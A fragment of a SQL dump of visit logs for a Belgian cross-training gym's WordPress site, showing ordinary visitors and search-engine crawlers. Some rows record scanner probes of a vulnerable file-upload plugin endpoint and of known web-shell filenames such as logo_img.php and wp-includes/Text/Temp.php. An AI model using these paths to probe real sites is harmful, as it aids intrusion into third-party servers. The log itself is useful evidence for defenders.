(73509, 1495647081.485304, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73510, 1495647081.905796, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73511, 1495647082.352660, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73512, 1495647692.491012, 1375117429, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73513, 1495647694.082626, 1375117429, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73514, 1495647705.720708, 1375117429, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73515, 1495647973.327804, 1375117429, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73516, 1495647990.777767, 1375117429, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73517, 1495648181.879440, 1375117429, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73518, 1495648182.935630, 1375117429, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73519, 1495651063.652771, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73520, 1495651064.236137, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73521, 1495651064.689618, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73522, 1495651065.165447, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73523, 1495651065.674995, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73524, 1495651066.431177, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73525, 1495651067.220565, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73526, 1495651067.681647, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73527, 1495651068.160204, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73528, 1495651068.705642, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73529, 1495651069.394223, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73530, 1495651527.644650, 2637637424, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73531, 1495656184.095400, 2637637424, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73532, 1495660438.151813, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(73533, 1495660439.701600, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(73534, 1495660441.357058, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(73535, 1495660443.067693, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(73536, 1495660444.663939, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(73537, 1495660446.264914, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(73538, 1495660447.881736, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(73539, 1495660449.500194, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(73540, 1495660452.617239, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(73541, 1495669603.070445, 3024883603, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73542, 1495678237.509801, 1123634231, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73543, 1495696496.325431, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73544, 1495696496.967946, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73545, 1495696497.484087, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73546, 1495696497.942782, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73547, 1495696498.370858, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73548, 1495696498.888595, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73549, 1495696499.435888, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73550, 1495696500.223435, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73551, 1495696500.843199, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73552, 1495696501.291481, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73553, 1495696501.841605, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73554, 1495700611.477981, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73555, 1495700612.105713, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73556, 1495700614.060218, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73557, 1495700614.812408, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73558, 1495700615.266361, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73559, 1495700615.681331, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73560, 1495700616.083647, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73561, 1495700616.535918, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73562, 1495700616.949606, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73563, 1495700617.358907, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73564, 1495700617.765761, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73565, 1495700618.241781, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73566, 1495700618.651100, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73567, 1495700619.073680, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73568, 1495704220.762259, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73569, 1495704221.241000, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73570, 1495704222.769752, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73571, 1495704223.188803, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73572, 1495704223.702053, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73573, 1495704224.095560, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73574, 1495704224.502871, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73575, 1495704224.986037, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73576, 1495704225.413774, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73577, 1495704225.854621, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73578, 1495704226.331547, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73579, 1495704226.941276, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73580, 1495704227.357474, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73581, 1495704227.783105, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73582, 1495706633.988550, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/', 'http://crosstrainingcenter.be/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(73583, 1495710916.197587, 3024883471, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73584, 1495711217.283234, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73585, 1495711217.822338, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73586, 1495711218.255494, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73587, 1495711218.768717, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73588, 1495712569.736121, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/cdg.php', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(73589, 1495712576.523686, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/cdg.php', 'http://www.crosstrainingcenter.be/cdg.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(73590, 1495712912.740867, 3024883600, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73591, 1495713125.636691, 3475901894, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73592, 1495713126.119100, 3475901894, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73593, 1495715277.776532, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73594, 1495715278.254080, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73595, 1495715278.709874, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73596, 1495715279.136417, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73597, 1495715279.685150, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73598, 1495715281.001042, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73599, 1495715281.600610, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73600, 1495715282.123313, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73601, 1495715282.619094, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73602, 1495715283.140618, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73603, 1495715283.601121, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73604, 1495733938.553501, 1538596638, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(73605, 1495746816.253135, 1540278443, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/logo_img.php', 'http://crosstrainingcenter.be/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(73606, 1495746816.304893, 1540278443, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/Text/Temp.php', 'http://crosstrainingcenter.be/wp-includes/Text/Temp.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(73607, 1495746816.314031, 1540278443, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(73608, 1495746816.316204, 1540278443, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/404.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/404.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(73609, 1495746816.377508, 1540278443, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/wp-ajax.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/wp-ajax.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(73610, 1495746816.405661, 1540278443, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/gray-whale/db.php', 'http://crosstrainingcenter.be/wp-content/themes/gray-whale/db.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(73611, 1495746816.537938, 1540278443, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/cache-template.php', 'http://crosstrainingcenter.be/wp-includes/cache-template.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(73612, 1495746816.542804, 1540278443, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/ms-head.php', 'http://crosstrainingcenter.be/wp-admin/ms-head.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(73613, 1495746816.705897, 1540278443, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/theme/info.php', 'http://crosstrainingcenter.be/wp-content/themes/theme/info.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(73614, 1495746816.756500, 1540278443, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/Text/Diff/class.php', 'http://crosstrainingcenter.be/wp-includes/Text/Diff/class.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(73615, 1495747216.502901, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73616, 1495749045.326734, 1123632579, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73617, 1495749046.602902, 1123633950, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73618, 1495756431.911428, 2637637388, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73619, 1495756432.036303, 2637637388, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73620, 1495757015.963623, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73621, 1495764493.959209, 1123633950, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(73622, 1495765292.939625, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73623, 1495767616.379871, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73624, 1495769996.865699, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73625, 1495769999.365880, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73626, 1495772229.009430, 872366418, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73627, 1495772247.849373, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73628, 1495773449.646863, 2366145567, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(73629, 1495774635.218891, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73630, 1495776166.329579, 1123633950, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73631, 1495776464.898682, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
